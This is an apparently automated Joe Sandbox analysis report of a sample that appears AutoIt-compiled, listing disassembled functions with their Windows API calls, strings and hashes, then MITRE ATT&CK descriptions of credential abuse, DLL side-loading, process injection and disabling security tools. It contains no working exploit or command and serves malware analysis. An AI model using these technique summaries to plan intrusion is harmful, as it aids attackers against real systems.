Part of subcall function 00B21D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B21D73
Part of subcall function 00B21D35: GetStockObject.GDI32(00000011), ref: 00B21D87
Part of subcall function 00B21D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B21D91

GetWindowRect.USER32(00000000,?), ref: 00BA6C71
GetSysColor.USER32(00000012), ref: 00BA6C8B

Strings

static, xrefs: 00BA6C4E

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: c5c3ab5965483d3e8c3ecff08ab5000bb3265476a0f52964d159dd5c24a49601
Instruction ID: 08a16455cc3b77b3cfcade11fb7e459a0ae24ea0caecd79f85d87ec97935d918
Opcode Fuzzy Hash: c5c3ab5965483d3e8c3ecff08ab5000bb3265476a0f52964d159dd5c24a49601
Instruction Fuzzy Hash: CB2167B251420AAFDB04DFA8CC45AFA7BE9FB09314F044668F995D3250E634E850DB60

Function 00BA6920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00BA69A2
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00BA69B1

Strings

edit, xrefs: 00BA6986

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 89aec0cf720b329c0cb584ed8b98da713250432d9eaaefe98dc100b24b5e02fc
Instruction ID: dcb64924bc017bf88551415c6a778e555f8e46aec580a655e59935e4994764fc
Opcode Fuzzy Hash: 89aec0cf720b329c0cb584ed8b98da713250432d9eaaefe98dc100b24b5e02fc
Instruction Fuzzy Hash: A8119DB1504104ABEB108E64DC85AFB37A9EB1A374F544764F9A4971E0CB31DC509760

Function 00B829AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B82A22
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00B82A41

Strings

0, xrefs: 00B82A18

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 7428aacc92e81add6bb3f29937d92585e9135575325bb7db33bf14cb86d8a199
Instruction ID: 20b2d3cb55f89a2e7201f9fbd78d1419402963a138ca721e334b79d4a831359e
Opcode Fuzzy Hash: 7428aacc92e81add6bb3f29937d92585e9135575325bb7db33bf14cb86d8a199
Instruction Fuzzy Hash: 4911D036901114ABCB38EB98D984BAA73E8EF45304F0440A1E855EB2B0D730ED0ACB91

Function 00B921D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00B9222C
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00B92255

Strings

<local>, xrefs: 00B9221D

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: fba01363ae181d3f200b6104bd90608652bd508a76e3bc197d60a80bb9b5a225
Instruction ID: 61f64ec068f313eeeb57587ef82f47bd71e34441876ecd1c5c5c24230e00394f
Opcode Fuzzy Hash: fba01363ae181d3f200b6104bd90608652bd508a76e3bc197d60a80bb9b5a225
Instruction Fuzzy Hash: F711CA70941226BADF298F518C89EFAFBE8FB06751F1082BAF90496000E2706890D6F0

Function 00B3092D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00B23C14,00BE52F8,?,?,?), ref: 00B3096E

Part of subcall function 00B27BCC: _memmove.LIBCMT ref: 00B27C06

_wcscat.LIBCMT ref: 00B64CB7

Strings

p~, xrefs: 00B309AE

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: FullNamePath_memmove_wcscat
String ID: p~
API String ID: 257928180-3223530150
Opcode ID: 6f888462427a9e01eb8bdd28ffe6fb312da30c6a11623969d5f8c7b78e8d7314
Instruction ID: 9478c5ac8534e76b28f16f9f5ec24d138376e40efbebcab0b38bc222ccf78f19
Opcode Fuzzy Hash: 6f888462427a9e01eb8bdd28ffe6fb312da30c6a11623969d5f8c7b78e8d7314
Instruction Fuzzy Hash: 4011C431A052199BCB50FBA8DC5AFDD73F8EF08341F1046E5B949D7291EEB097845B18

Function 00B78E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B27DE1: _memmove.LIBCMT ref: 00B27E22

Part of subcall function 00B7AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00B7AABC

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00B78E73

Strings

ListBox, xrefs: 00B78E3D
ComboBox, xrefs: 00B78E12

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 13cf15f6be49032ae70ad760d82068397e9e36dd99ea1bd20c76b392b4e61c33
Instruction ID: c3a04296edfede57656e554b95d7d90b3a4b2d216494a84dce5143b4a46d6221
Opcode Fuzzy Hash: 13cf15f6be49032ae70ad760d82068397e9e36dd99ea1bd20c76b392b4e61c33
Instruction Fuzzy Hash: 97012D71681125ABCB14EBA4CC45CFE73E8EF02320B044699F839573E1EF315808D750

Function 00B88D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00B88DAC
__fread_nolock.LIBCMT ref: 00B88DC1

Strings

EA06, xrefs: 00B88DF3

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 6973ba23d9f6cae2cdb94c38befbae56f4bc02e16a044f6f47e30070ec652aac
Instruction ID: ac7247b887d54130479c76622e36bac71415582850965d72c7b1577d281bf551
Opcode Fuzzy Hash: 6973ba23d9f6cae2cdb94c38befbae56f4bc02e16a044f6f47e30070ec652aac
Instruction Fuzzy Hash: 2001D6718042187FDB28DAA88856EAEBBF8DB11301F00419EE552D2281E875A6049760

Function 00B78CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B27DE1: _memmove.LIBCMT ref: 00B27E22

Part of subcall function 00B7AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00B7AABC

SendMessageW.USER32(?,00000180,00000000,?), ref: 00B78D6B

Strings

ListBox, xrefs: 00B78D35
ComboBox, xrefs: 00B78D0A

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 3618a326902f19e7e289749baaa7c34deb135230e62e894187ed56321add72ef
Instruction ID: 3db0caa8d7488edaed3f14311b839c88c3ec2316232b980d52c1f3c5eff5e53a
Opcode Fuzzy Hash: 3618a326902f19e7e289749baaa7c34deb135230e62e894187ed56321add72ef
Instruction Fuzzy Hash: 7C01FC71781119ABCB24E7E0CD96EFE77ECDF15340F1040A97419632E1EE215E08D271

Function 00B78D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B27DE1: _memmove.LIBCMT ref: 00B27E22

Part of subcall function 00B7AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00B7AABC

SendMessageW.USER32(?,00000182,?,00000000), ref: 00B78DEE

Strings

ListBox, xrefs: 00B78DBA
ComboBox, xrefs: 00B78D8F

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 8059c3b6751541d26bd646295d69362ae6ac5048571958681f30afb71aa313c7
Instruction ID: ff03b9dbfe22ce47fe7f6ec1b1e9548e62b5d01fc198ab47cd3bf622d0954d5d
Opcode Fuzzy Hash: 8059c3b6751541d26bd646295d69362ae6ac5048571958681f30afb71aa313c7
Instruction Fuzzy Hash: 07012BB1A81119B7CB25E7E4CD86EFE77ECCF11340F1040A9B819632D1EE214E09D271

Function 00B84F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00B84F46
_wcscmp.LIBCMT ref: 00B84F58

Strings

#32770, xrefs: 00B84F52

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: cb63d5810d82186ba3fa01048e89d81823de3d85c002b7af4bfbe452151e56c8
Instruction ID: 195e9b4bf8d7d82ed1f8ee4b4e5c0321b454b8bfef647a92f7da9769d3f711bb
Opcode Fuzzy Hash: cb63d5810d82186ba3fa01048e89d81823de3d85c002b7af4bfbe452151e56c8
Instruction Fuzzy Hash: 22E09B3260022926D7109695AC46FA7F7ECDB65B61F000157FD04D7151D9609A4587D0

Function 00B5B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00B5B314: _memset.LIBCMT ref: 00B5B321

Part of subcall function 00B40940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00B5B2F0,?,?,?,00B2100A), ref: 00B40945

IsDebuggerPresent.KERNEL32(?,?,?,00B2100A), ref: 00B5B2F4
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00B2100A), ref: 00B5B303

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00B5B2FE

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: 6de5b5943e6c9de1f0018c85c6e49a712430b21ef4a4676a1651a35a09c5d759
Instruction ID: ecdc884874f9eab71c7a88919d7073b8f1a3ff8a50475eebbc4873ef9ec42589
Opcode Fuzzy Hash: 6de5b5943e6c9de1f0018c85c6e49a712430b21ef4a4676a1651a35a09c5d759
Instruction Fuzzy Hash: 27E092702007128FDB20EF68E404B427BE4EF04305F008AECE856D7251EBB4D408CBA1

Function 00B77C74 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00B77C82

Part of subcall function 00B43358: _doexit.LIBCMT ref: 00B43362

Strings

AutoIt, xrefs: 00B77C76
Error allocating memory., xrefs: 00B77C7B

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 1f863b2ae03393a5e5821d1b8d0b8a4cae692879529815219b3db33abd7cbd29
Instruction ID: 8631feba8c8c0aff284116c2144f620fce61c6f53225cfebb87aeedcb51fbce1
Opcode Fuzzy Hash: 1f863b2ae03393a5e5821d1b8d0b8a4cae692879529815219b3db33abd7cbd29
Instruction Fuzzy Hash: 25D012323C831836D11532A96D07BDA6AC88B05B52F0448A6BB08595E34DD1499051A9

Function 00B61935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 00B61775

Part of subcall function 00B9BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00B6195E,?), ref: 00B9BFFE
Part of subcall function 00B9BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00B9C010

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00B6196D

Strings

WIN_XPe, xrefs: 00B61788

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: 83eb26e310c43b5b7807d8c4d8766eac2ce3d5db25d3041b818df588c019a805
Instruction ID: ccda9f770c50c23c2a765ec3071beab00bb6d6b455e733ff90847b382f0b10ad
Opcode Fuzzy Hash: 83eb26e310c43b5b7807d8c4d8766eac2ce3d5db25d3041b818df588c019a805
Instruction Fuzzy Hash: 36F0A5B1800109DBDB15DB95D9C5BFCBBF8AB18301F6804D5E102A7190DB755E84DF61

Function 00BA5998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00BA59AE
PostMessageW.USER32(00000000), ref: 00BA59B5

Part of subcall function 00B85244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B852BC

Strings

Shell_TrayWnd, xrefs: 00BA59A7

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 1278eb5281a229fe66fa3be794da31a7722396f336304b35a80235f6776580fb
Instruction ID: ab09def652100c02ac35b189985057560473fbc88999685d39b6b51e3dfc2df9
Opcode Fuzzy Hash: 1278eb5281a229fe66fa3be794da31a7722396f336304b35a80235f6776580fb
Instruction Fuzzy Hash: 7CD0C9317803127AE664BBB0AC4BFE66695BB15B51F000865B245AB1E0DDE0A800C754

Function 00BA5964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00BA596E
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00BA5981

Part of subcall function 00B85244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B852BC

Strings

Shell_TrayWnd, xrefs: 00BA5967

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 8c5b43805b45491b94786ef6376bf33de2aaaca8e6546a0478b1c428ca8c4077
Instruction ID: 38e01743be6fcbfbe71c880f4507c220ea3c88b3a01b6d0813b0827af97f9765
Opcode Fuzzy Hash: 8c5b43805b45491b94786ef6376bf33de2aaaca8e6546a0478b1c428ca8c4077
Instruction Fuzzy Hash: F5D0C935784312B6E664BBB0AC5BFE66A95BB11B51F000865B249AB1E0DDE0A800C754

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

